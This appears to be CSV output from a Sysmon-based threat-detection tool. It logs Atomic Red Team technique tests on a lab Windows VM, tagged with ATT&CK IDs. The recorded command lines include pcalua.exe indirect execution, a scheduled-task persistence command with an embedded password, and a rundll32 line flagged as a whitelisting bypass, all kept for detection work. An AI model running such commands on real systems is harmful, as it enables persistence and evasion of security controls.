<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548273.882434,2019-07-19T18:57:53.882434+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a C:\Windows\system32\javacpl.cpl ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:52.982726Z"">
</TimeCreated>
<EventRecordID>4097</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:52.816</Data>
<Data Name=""ProcessGuid"">747F3D96-DA70-5D31-0000-00100E2C3F00</Data>
<Data Name=""ProcessId"">112</Data>
<Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Program Compatibility Assistant</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">pcalua.exe -a C:\Windows\system32\javacpl.cpl</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA70-5D31-0000-001007293F00</Data>
<Data Name=""ParentProcessId"">608</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a C:\Windows\system32\javacpl.cpl&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548272.982726,2019-07-19T18:57:52.982726+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a C:\Windows\system32\javacpl.cpl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:52.923610Z"">
</TimeCreated>
<EventRecordID>4096</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:52.784</Data>
<Data Name=""ProcessGuid"">747F3D96-DA70-5D31-0000-001007293F00</Data>
<Data Name=""ProcessId"">608</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a C:\Windows\system32\javacpl.cpl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548272.92361,2019-07-19T18:57:52.923610+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a Java ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:50.453840Z"">
</TimeCreated>
<EventRecordID>4095</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:50.232</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6E-5D31-0000-001081F93E00</Data>
<Data Name=""ProcessId"">1284</Data>
<Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Program Compatibility Assistant</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">pcalua.exe -a Java</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA6E-5D31-0000-0010D8F63E00</Data>
<Data Name=""ParentProcessId"">3316</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a Java&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548270.45384,2019-07-19T18:57:50.453840+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a Java&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:50.398446Z"">
</TimeCreated>
<EventRecordID>4094</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:50.198</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6E-5D31-0000-0010D8F63E00</Data>
<Data Name=""ProcessId"">3316</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a Java&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548270.398446,2019-07-19T18:57:50.398446+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a -c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:47.238555Z"">
</TimeCreated>
<EventRecordID>4093</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:47.232</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6B-5D31-0000-00102DD33E00</Data>
<Data Name=""ProcessId"">5348</Data>
<Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Program Compatibility Assistant</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">pcalua.exe -a -c</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA6B-5D31-0000-0010CCD03E00</Data>
<Data Name=""ParentProcessId"">5332</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a -c&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548267.238555,2019-07-19T18:57:47.238555+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a -c&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:47.218345Z"">
</TimeCreated>
<EventRecordID>4092</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:47.195</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6B-5D31-0000-0010CCD03E00</Data>
<Data Name=""ProcessId"">5332</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a -c&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548267.218345,2019-07-19T18:57:47.218345+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.927290Z"">
</TimeCreated>
<EventRecordID>4091</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.915</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-00104BC83E00</Data>
<Data Name=""ProcessId"">888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1563548266.92729,2019-07-19T18:57:46.927290+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.849870Z"">
</TimeCreated>
<EventRecordID>4090</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.845</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010C5C43E00</Data>
<Data Name=""ProcessId"">3352</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Task Scheduler Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA6A-5D31-0000-001074C23E00</Data>
<Data Name=""ParentProcessId"">3872</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.84987,2019-07-19T18:57:46.849870+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.828722Z"">
</TimeCreated>
<EventRecordID>4089</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.814</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-001074C23E00</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN &quot; Atomic &quot;task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:50.764089Z"">
</TimeCreated>
<EventRecordID>4135</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:50.383</Data>
<Data Name=""ProcessGuid"">747F3D96-DDB6-5D31-0000-0010273D4C00</Data>
<Data Name=""ProcessId"">3952</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-0020FF090500</Data>
<Data Name=""LogonId"">0x509ff</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4A4-5D31-0000-0010DD6D0000</Data>
<Data Name=""ParentProcessId"">804</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
